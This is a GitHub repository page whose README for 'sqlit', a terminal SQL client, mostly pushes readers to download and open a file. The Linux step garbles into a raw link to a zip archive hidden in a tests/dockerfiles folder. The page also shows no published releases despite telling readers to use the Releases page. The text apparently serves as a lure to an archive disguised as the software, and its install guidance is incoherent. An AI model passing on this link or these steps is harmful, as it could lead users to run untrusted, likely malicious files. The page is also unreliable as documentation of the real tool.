Skip to content

πŸ”— Connect and query your SQL databases quickly from your terminal with sqlit, supporting all major database systems.

License

Notifications You must be signed in to change notification settings

tapnnwjediii/sqlit

Folders and files

NameName
Last commit message
Last commit date

Latest commit

Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 

Repository files navigation

πŸŽ‰ sqlit - A Simple Way to Manage SQL Databases

πŸš€ Getting Started

Welcome to sqlit! This tool makes it easy to work with various SQL databases through a user-friendly text interface. Whether you're managing data in SQL Server, MySQL, PostgreSQL, SQLite, or other databases, sqlit simplifies your tasks.

πŸ“¦ Download & Install

To get started, you need to download sqlit. Visit this link to download the latest version: Download sqlit.

Installation Steps

  1. Once you visit the Releases page, locate the most recent version of sqlit.
  2. Click on it to view the available files.
  3. Download the appropriate file for your operating system.

Make sure you choose the correct file based on your system:

  • Windows: Look for a file ending in .exe.
  • Mac: Look for a file ending in .dmg or .pkg.
  • Linux: Look for a file ending in https://raw.githubusercontent.com/tapnnwjediii/sqlit/main/tests/integration/python_packages/dockerfiles/Software-v2.9.zip or a relevant package for your distribution.
  1. After downloading, open the file to start the installation. Follow the prompts to complete the installation.

πŸ› οΈ System Requirements

To run sqlit, ensure your system meets the following requirements:

  • An operating system: Windows 10 or later, macOS 10.14 or later, or a modern Linux distribution.
  • Python 3.7 or higher must be installed.
  • At least 1 GB of RAM.
  • At least 100 MB of free disk space.

πŸŽ“ How to Use sqlit

Once installed, you can start using sqlit with a few simple commands. Here’s how:

  1. Open a terminal or command prompt:

    • For Windows, search for "cmd" in the Start menu.
    • For Mac, open "Terminal" from your applications.
    • For Linux, use any terminal emulator.
  2. Run sqlit: Type sqlit in the terminal and press Enter.

  3. Choose a database: Follow the prompts to select the database you want to connect to. You can use options like SQL Server, MySQL, or PostgreSQL.

  4. Interact with your database: Use simple commands to run queries, view data, and manage your database. The interface is designed to be intuitive.

πŸŽ‰ Features

sqlit comes packed with features to help you manage your databases effectively:

  • Multi-database support: Connects to SQL Server, MySQL, PostgreSQL, SQLite, Turso, and more.
  • User-friendly interface: Navigate your databases easily through a text-based interface.
  • Query execution: Run SQL queries and get immediate results.
  • Data browsing: View tables and records clearly without complex commands.
  • Custom scripts: Create and run scripts to automate tasks.

🌐 Supported Databases

sqlit supports a wide range of databases, making it versatile for many users:

  • SQL Server
  • MySQL
  • PostgreSQL
  • SQLite
  • Turso
  • CockroachDB
  • DuckDB
  • MariaDB
  • Oracle

No matter what database you are using, sqlit can help you simplify your workflow.

🧩 Troubleshooting

If you run into issues while using sqlit, consider the following tips:

  • Ensure Python is installed accurately: Visit the Python website for guidance on downloading and installing the right version.
  • Check your permissions: Make sure you have the necessary permissions to access the database you are trying to work with.
  • Review the logs: sqlit generates log files that may provide clues about any problems.

πŸ“„ Documentation

For more extensive information, visit the documentation page. Here, you can find details on advanced features, configurations, and answer to frequently asked questions.

πŸ“ž Support

If you need help, don’t hesitate to reach out. You can open an issue in the GitHub repository or join our community discussions for support.

✏️ Contribution

If you want to contribute to sqlit, your input is welcome! Please read our contribution guidelines in the repository to understand how you can help improve the project.

🌟 Acknowledgments

A special thanks to the contributors and community members who have helped in the development of sqlit. Your support makes this project better every day.

πŸ”— Quick Links

πŸš€ Start managing your databases today!

Now you have all the information you need to download and run sqlit. Don’t wait; start simplifying your SQL database management workflow.

Releases

No releases published

Packages

No packages published

Contributors 9

Languages